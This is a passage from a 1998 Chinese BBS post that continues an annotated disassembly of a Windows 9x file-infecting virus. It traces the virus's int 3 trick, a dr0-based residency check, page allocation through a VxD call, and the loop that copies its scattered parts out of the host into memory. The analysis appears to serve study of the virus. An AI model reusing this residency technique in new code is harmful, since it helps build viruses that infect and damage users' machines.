发信人: crazydiamond()
整理人: jia(1998-10-26 01:23:53), 站内信件
|
接上回: :00000036 int 03 ;跳到 00000063 处 ....... :00000063 je 00000097 ;判断是否第二次调用? 是则跳转 :00000065 mov ecx,dr0 :00000068 jecxz 0000007A ;驻留判断, 若dr0零则继续 :0000006A add dword ptr [esp], 00000015 :0000006E mov word ptr [ebx-04], bp :00000072 shr ebp, 10 :00000075 mov word ptr [ebx+02], bp ;恢复原来的Int3 返回 :00000079 iret
:0000007A mov dr0,ebx :0000007D push 0000000F :0000007F push ecx :00000080 push FFFFFFFF :00000082 push ecx :00000083 push ecx :00000084 push ecx :00000085 push 00000001 :00000087 push 00000002 :00000089 vxdcall _PageAllocate :0000008F add esp, 20 :00000091 xchg eax,edi ;edi 指向分配的页地址 :00000093 lea eax,[esi-63] :00000096 iret ;返回00000037 ....... :00000037 push esi ;eax 指向病毒代码开始处 : 00000000 :00000038 mov esi, eax :0000003A mov ecx, dword ptr [eax-04] :0000003D repz :0000003E movsb :0000003F sub eax, 00000008 :00000042 mov esi, dword ptr [eax] :00000044 or esi, esi :00000046 je 0000004A :00000048 jmp 0000003A ;病毒体将自身从宿主程序里抽出,复制到分配的内存页,完成驻留 ;病毒体信息是按 ;partN起始,partN长度,......,part1起始,part1长度 ;从病毒代码起始(即00000000)向前排列的,各占1字长 :0000004A ......
-- ............
※ 来源:.广州网易 BBS bbs.nease.net.[FROM: 202.96.101.254]
|
|